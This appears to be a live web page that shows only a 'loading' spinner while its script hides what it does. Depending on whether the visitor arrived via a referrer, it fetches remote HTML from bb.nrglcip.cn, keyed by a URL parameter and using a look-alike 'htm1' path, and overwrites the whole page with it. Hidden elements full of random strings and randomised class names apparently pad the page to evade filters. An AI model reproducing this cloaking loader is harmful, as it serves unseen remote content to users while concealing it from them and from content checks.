<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .sQlTeQ {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .sQlTeQ .qR8d5PuWI3 {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .sQlTeQ .content {
            line-height: 50px;
            text-align: center
        }

        .sQlTeQ .img {
            width: 100%
        }

        .sQlTeQ .T8p2tPPI {
            text-align: center
        }

        .sQlTeQ .T8p2tPPI span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .sQlTeQ .T8p2tPPI span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .sQlTeQ .T8p2tPPI span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .sQlTeQ .T8p2tPPI span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .sQlTeQ .T8p2tPPI span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .sQlTeQ .T8p2tPPI span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .sQlTeQ .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function AEmSeJnTW5(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var RhF4xeE = AEmSeJnTW5('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ RhF4xeE +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ RhF4xeE +".html?a=share";
		}
		
        GuuVQfG=url+"#"+new Date().getTime();
        GuuVQfG && function() {
            $.get(GuuVQfG, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<p  style='display:none'>viDqplMMbg3XPXol1WUAusYBLJivNyH2CAm0rRsYzfbuneuX1qildXoqKAkPwS9Jr36vOwAwr</p>
<li style='display:none' >NQD0qtvyQNQsPmitX352hnXQq7</li>
<h1 style='display:none' >UVn0nBnoiGc9TJeoDqRzeivtPcPcbNiqcvgUwgKp7fESjtjfUVZSdeARnHs7e3bnaSZ7hgkfhz1Mtl8HzYlvu8</h1>
<b style='display:none' >xSwgaQFonnA1A0vfylPUrsrD7BHqYRs8mGGSArbYmQQLs</b>
<li style='display:none' >NQD0qtvyQNQsPmitX352hnXQq7</li>
<span style='display:none'>vFOy7TkzE9hEf4cNs9aIEgFWyiyUUfXnDVWuA0TrgDGkwtnFihTBESrN17dchA2OnAK16</span>
<li style='display:none' >NQD0qtvyQNQsPmitX352hnXQq7</li><div class="sQlTeQ">
    <div class="qR8d5PuWI3">
        <div class="T8p2tPPI">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<img  src='' style='display:none'>
<ul style='display:none' >qDAxGjerxFFMvUobI1gnL0GzKXW5Cpo2JXcOdaJP0z0cg67lsM1K8dz7oF6oYzLybXRlRF7sx1beRxTdSmat53jjFN1</ul>
<b style='display:none' >ZEwjE1fCX0i4vQtmcUdEUe5BXjY9RLeDz0XvfARuqwTVIgAaqOz8oEIX20hSAFlLXS6L30OmbIpQqPJav1B1D2o2f</b>
<div style='display:none'>HFm5t6I8hXZd</div>
<a  href='#' style='display:none'>r8yXZgxhEL9EyhbdnCw9IMbk4Sjpc5H2IH03t8ihQwp7xkMAIE4Jqpx6bJ0S26NPiuAf4xcXYJFk50jCwhde4</a>
<span style='display:none'>o1CJAbAo8DdUr2HEysvCLW5zxzysYn7cp0Dbr5F0NNujz6OXFWAu7lmMhyg421hSMGEFrTwuClp3</span></body>
</html>